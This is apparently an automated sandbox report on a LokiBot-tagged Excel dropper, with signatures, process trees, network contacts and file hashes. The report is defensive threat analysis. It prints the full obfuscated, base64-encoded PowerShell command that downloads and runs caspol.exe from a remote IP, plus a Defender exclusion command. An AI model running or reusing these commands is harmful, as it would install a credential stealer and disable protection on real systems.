Malware Analysis Report

2025-04-03 09:51

Sample ID 241118-wc362awqhm
Target PO-000041492.xls
SHA256 555c9fab8b1c2180ec0c140d7ef7a072d3848661e47051b4dda5de40a61465b7
Tags
lokibot collection defense_evasion discovery execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

555c9fab8b1c2180ec0c140d7ef7a072d3848661e47051b4dda5de40a61465b7

Threat Level: Known bad

The file PO-000041492.xls was found to be: Known bad.

Malicious Activity Summary

lokibot collection defense_evasion discovery execution spyware stealer trojan

Lokibot

Lokibot family

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Evasion via Device Credential Deployment

Blocklisted process makes network request

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Uses Volume Shadow Copy WMI provider

outlook_office_path

Checks processor information in registry

Uses Task Scheduler COM API

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-18 17:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-18 17:47

Reported

2024-11-18 17:50

Platform

win7-20240903-en

Max time kernel

140s

Max time network

151s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-000041492.xls

Signatures

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 968 set thread context of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2684 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2684 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2684 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2684 wrote to memory of 2416 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2416 wrote to memory of 1404 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 1404 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 1404 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 1404 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 1504 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2416 wrote to memory of 1504 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2416 wrote to memory of 1504 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2416 wrote to memory of 1504 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1504 wrote to memory of 2012 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1504 wrote to memory of 2012 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1504 wrote to memory of 2012 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1504 wrote to memory of 2012 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2416 wrote to memory of 968 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2416 wrote to memory of 968 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2416 wrote to memory of 968 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2416 wrote to memory of 968 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 968 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-000041492.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE

"C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'JEFIQ2MxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3piR3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZEdvU2hpRWwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZZTGlNem4sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNQmdOa1F0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLWHhFWHhxZEVFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSENjMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzY2LjYzLjE4Ny4yMzEvNjU3L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtTVGFSVC1zbGVFcCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGNhc3BvbC5leGUi'+[ChAR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qk93a-ep.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5CC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5CB.tmp"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 link.uebie.de udp
DE 5.45.108.48:443 link.uebie.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 88.221.135.105:80 e6.o.lencr.org tcp
US 66.63.187.231:80 66.63.187.231 tcp
DE 5.45.108.48:443 link.uebie.de tcp
US 66.63.187.231:80 66.63.187.231 tcp
US 66.63.187.231:80 66.63.187.231 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.252.157:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
DE 94.156.177.95:80 tcp
DE 94.156.177.95:80 tcp

Files

memory/2636-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2636-1-0x000000007403D000-0x0000000074048000-memory.dmp

memory/2684-18-0x0000000002640000-0x0000000002642000-memory.dmp

memory/2636-19-0x0000000002510000-0x0000000002512000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B083487247EB8FBD76503EF0DA269B6B

MD5 dfe9d40108cd6499968560d0319998c6
SHA1 6b79281f7efec1b9fb942e6e0cd3eb5e9f776e73
SHA256 1dc7e4150fff57a7423b4d0ebeb3a5f966593b4dad4b803840f6c4a2f814951e
SHA512 5d4d685a5f15372d4ae8fdc08ab92d2f2f173f586b58315d35a62318f71b9fce7f84b4501f50024e95225a53856ab8170bcf1adf8805eaddb392250082c9ff56

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B083487247EB8FBD76503EF0DA269B6B

MD5 0119335333261c14936f2646c0471b15
SHA1 d83abad73fafbcb44b5ffa5d06ca1d3b97959c3e
SHA256 323399364e979e8ada741b823f7f8a8bd035a36c4ba4b1a2fd101057d4251dec
SHA512 3dbb5c60cb09220ccdc4062aa37ab50b73792882118940dc2b3adf9efd355d09a25b3ae26d8786f99a69da474ee8b091fcef77618957ed0a18506be01b966c31

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 18ed994e35845483e698cd86e55a8bf2
SHA1 c8816e93af865a45fa20c1cbcc9fd69fc29c4e75
SHA256 29f3037a0ec5d1ffa6dfd710258220b423e158e1a39e1fb3a009077cbccf3cb1
SHA512 a6217f931ebdc0aa4ebd95a86a0db911a2dbdd654ea72d1c1ea0d4c89ffaffabca2abf16e94e082d8ebc59e561f2df5bdce50884b5bf17f08e600d0bca54568e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 512bd3fdb8071bbb4d35ce589fe6571c
SHA1 e17d4c26d10fe5e709b3a3549006eb244529e6f7
SHA256 ce8a12bc8036707ad6c2c865bc1a8e97540361e07e62b27e5f7ea4d3e60165fc
SHA512 27ce8cb7c2931ccb00813922ddffe2b5f4d7302670e6fdda06ab677ba56d74f52511a592bbc84f2e946e7addae14cd05ad6e4ca67732005dc560bcf336185622

C:\Users\Admin\AppData\Local\Temp\CabF058.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor[1].hta

MD5 db21eb9cf86a8314900d693c5a40c4e9
SHA1 1dd5c5e45f4c0224a6c4f4ce443bcb542fc5913c
SHA256 da1ae3eef8260a07b09c7978317fed23be8c431f2620629a9bc3f170df113102
SHA512 b589c6d47dd7dc29d3e8e6823c68966ee388d5e78fbc5b300abd38829443889591efe774564c861349dcad7b1981f9317b60fb1c19a3b232f12c64e403783f2c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 72dedba1ca2861970a3e96b93b4e916d
SHA1 527c5f09726b73a5b9070675c6d702750bc0868d
SHA256 06a4311011084bdec6fe8eda8c6d1a2681aba0353d4c96a4089dece3c970c911
SHA512 025a3095161c0b2201d544b3819ce70be5bbfe66e69559d46a16e40310731ddcc1e88e92e8276c1b0d754c651a2f2cea95d976adc32ed5c4d46d909e484686dc

\??\c:\Users\Admin\AppData\Local\Temp\qk93a-ep.cmdline

MD5 914e799a7629b8633112a601d2237f0a
SHA1 1fc3870c068b7711356e779c339f77b4f87ac2b2
SHA256 369f707b61aa55c61f51e1bdfc093c2143433f77e74df4716239828363451dfe
SHA512 8d395038e526362427ee80940cc06d374898a401eb28ad65640186f2ffa5af4f0f9dabd915c5c329682c44c4699ad16651661c87f7a7ecebc4c846fd1fd41515

\??\c:\Users\Admin\AppData\Local\Temp\qk93a-ep.0.cs

MD5 f97fc8141f59078b4354b513d3b083ac
SHA1 293904ab8d5f38a2f0764ee2e35e97e590d8c737
SHA256 f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e
SHA512 87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c

\??\c:\Users\Admin\AppData\Local\Temp\CSC5CB.tmp

MD5 86ee229377d5dd9fa4df127e75df942b
SHA1 394242040d8daf6eb739025fef9509df7332ff90
SHA256 385d734cb7169703ba5babe974906acc32f53d066957ab1a7f9f8748fd932a8f
SHA512 95fe81e34756943cf7b1b349ab8ec056bd6005a24bf3a8d8040354b392701a76a045a649c067f2eb8f4895dbc22f18dc0554c7f8a1468f189ad748785951c2d1

C:\Users\Admin\AppData\Local\Temp\RES5CC.tmp

MD5 de45d5adf56769d6f21cbafd15cb93f2
SHA1 e377339bea1681eb06b04b417cdc88afa869f3dc
SHA256 156647b8206c95bc4070b37d85675bd3465fa15a4f1d25e33625c506f9ba0a0e
SHA512 6d5eb4a5db5dc3d5585aba858f8f7186faa3f244308bc4c166e93d49cd83206721fcf280d3220e08f3a85c4139974f4b346cac5fcc263346e578bd8b2cffc330

C:\Users\Admin\AppData\Local\Temp\qk93a-ep.dll

MD5 cb506349d225018a4d8e37d35ce3459b
SHA1 dd76f6a79afd5d2ee943909d55f24325d003d1e7
SHA256 7c4bd4101adbae94f38a08f6f6606559468e544ee16c199da7b49baf093609f7
SHA512 fad78a106a0ebe332c399af7f42a292ea1103783be9a40e41d1b6d7226ba115ccf7bfd1b998a6821c567358c7d97f22a7986a8dffbb47058b3ab550ec198a250

C:\Users\Admin\AppData\Local\Temp\qk93a-ep.pdb

MD5 03f727298ed7d2695597a8d213f2faef
SHA1 d64c77cd944af481fae3f772b8cf8e831d5f6b8d
SHA256 b7151d0620b3dc1991080e325f511f1e129544facb92a76d217b107f92ac25c6
SHA512 0d91fcf894a60bdc26cb8b36dba717ea58512c6d2c6a0dff470bbe68e8a4f3806744e83f2e31271420f4e8f942f9a5d3be5575d805fc44827ee52c14936a69e2

memory/2636-59-0x000000007403D000-0x0000000074048000-memory.dmp

C:\Users\Admin\AppData\Roaming\caspol.exe

MD5 80358303e33cef71434e6e4a621262c5
SHA1 e7a22b4e5af741f9b4d9982f36164b276bba459a
SHA256 f3246d0ca5ca8e69f98ca33b2c17813d5d862049dcfa9931dbcbaaaf7543a1f7
SHA512 5e68b8c63afe7c0e91396f42f485cd84946235ab11d9ce7107bbcf75568ff3087d5e14378f87d77733376e332f516f26db838b870ca580569178b15c0a90761e

memory/968-74-0x0000000000210000-0x00000000002A4000-memory.dmp

memory/968-75-0x0000000000320000-0x0000000000332000-memory.dmp

memory/968-76-0x00000000056C0000-0x0000000005724000-memory.dmp

memory/2292-80-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2292-90-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2292-91-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2292-88-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2292-86-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2292-84-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2292-82-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2292-93-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-18 17:47

Reported

2024-11-18 17:50

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-000041492.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
